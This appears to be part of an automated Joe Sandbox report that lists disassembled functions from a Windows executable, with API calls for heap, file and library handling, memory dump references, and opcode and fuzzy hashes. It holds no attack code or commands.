                                                                                                                                                                                                                                                            Function 00007FF6404FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                                            • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction ID: 11897ebdb6b1aed41625d52ba5738dee62e4ce4432e9c10f9297da2409d0f1b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811C161B0CAA1D1DA10FB25A94416D6366EB45BF4F640331EEBD87BEACF3CD0508740
                                                                                                                                                                                                                                                            Function 00007FF6404F9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction ID: 0bccee64ff07e10a3435a72a9376a38827acb2b2b52508163820708f931c66c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9E04610F0C6A2A2FB0CBBF2A8841BA22A69F98704B004034CD1DC2391EE3C68858310
                                                                                                                                                                                                                                                            Function 00007FF6404F9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9ED6
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F9CE5,?,?,00000000,00007FF6404F9D9A), ref: 00007FF6404F9EE0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                                            • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                            • Instruction ID: ce65d005f3c599956d7377c05d52b6584ab2b91f09bd573bfdf45ccabada9453
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C219621F1C662A1FE94B7A1A59037D2297DF84798F044239DA2EC77D1CF6CA841C300
                                                                                                                                                                                                                                                            Function 00007FF6404FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                            • Instruction ID: 9cf5907d01376cd0e5bb6381034db65cfcb815592214ca52d8606e2caa297b7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0441DE3290C221E7EA24BB59E95127D73AAEB56B84F140131DA9EC37D0CF3CE802C790
                                                                                                                                                                                                                                                            Function 00007FF6404E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                                            • Opcode ID: 8840c51cff740f457cb9f633435f9564d8ee93713ed93b20b8234af09ab3face
                                                                                                                                                                                                                                                            • Instruction ID: 79de33e144b85122254a00d928d83cc061d4d76854a3312fe009ac64147d9609
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8840c51cff740f457cb9f633435f9564d8ee93713ed93b20b8234af09ab3face
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10219125B0C672A6FA10FB16A9047BAA641BF95BE4F884430EE4D87786CE7DF042C740
                                                                                                                                                                                                                                                            Function 00007FF6404FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                                                                                                                                                                                            • Instruction ID: 05f3f1823e8e69add7a8ad172ae4d9fcce3b3ad2063d67eee3f14008919838cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431E461E1C6A2E2F701BB1488413BD365AAF90BA0F420135DA2DC33D2CF7CE4918721
                                                                                                                                                                                                                                                            Function 00007FF6404F8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                                            • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction ID: 51d733b6250d5547d370224725a845e3b5ccf9c87fdbc428cb44c683dca630a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921AE32B19756DAEB24BF64C4402EC33A9FB44328F44063ADA2C8ABC5EF38D444CB50
                                                                                                                                                                                                                                                            Function 00007FF6404F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                            • Instruction ID: dc31aa50d951ef221e0474c8df62c83c772d02d4cbe8831db6819300e62d3fa0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A11A231E1C6A1D2EA60BF51940027EA3AABF95B84F454531EF4CD7B96CF3CE8408B54
                                                                                                                                                                                                                                                            Function 00007FF640505664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction ID: eedf25f2b05d0655e21498cbdec18688e9d19f6df4cd42a0092cd8ddb62cc3eb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD21C53260C68196DB65BF28D54037E72A1FB86B98F544234DA6D877D5DF3DD8008B00
                                                                                                                                                                                                                                                            Function 00007FF6404EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction ID: aefa84df2ba0a0cd2fca3bf567ad65d4562a04af02d94f99f3b79dd55db81223
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7901C421A1C7A290EA04FF569900079A695FF96FE0F484631DE6C93BD6DF3CE4029340
                                                                                                                                                                                                                                                            Function 00007FF6404E81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,00007FF6404E5C06,?,00007FF6404E308E), ref: 00007FF6404E81C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                                                                            • Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                                                            • Instruction ID: 9c35eadd9dc4f6adfc24770bf99ed30d40ea9da551ffef3ce53d639e16dc83fc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD08C11B2826191FE58FB77AA4A56951529BCABC0E488034EE1C43B46DC3CC0804B00
                                                                                                                                                                                                                                                            Function 00007FF6404FC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF6404EFFB0,?,?,?,00007FF6404F161A,?,?,?,?,?,00007FF6404F2E09), ref: 00007FF6404FC94A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                                            • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction ID: f521ba59cfb01d67be82970a1102318cebdaaca2b8441e20f092a82f209aff6b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01251F2D267E5FE5876B15A51BB9128A9F84774F084630DD3EC53C1DEACA5418310

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 00007FF6404E79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A1B
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7A9E
                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ABD
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ACB
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7ADC
                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF6404E7EF9,00007FF6404E39E6), ref: 00007FF6404E7AE5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                            • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                            • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                            • Instruction ID: 135ee184f5db4f079a8e8967783671618695dee313c272bd813e7931e680f166
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A417321A0C562E5EA20FB24E5949BD6360FFA5764F440632D9ADC37D4DF3CE64AC780
                                                                                                                                                                                                                                                            Function 00007FF6404EC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
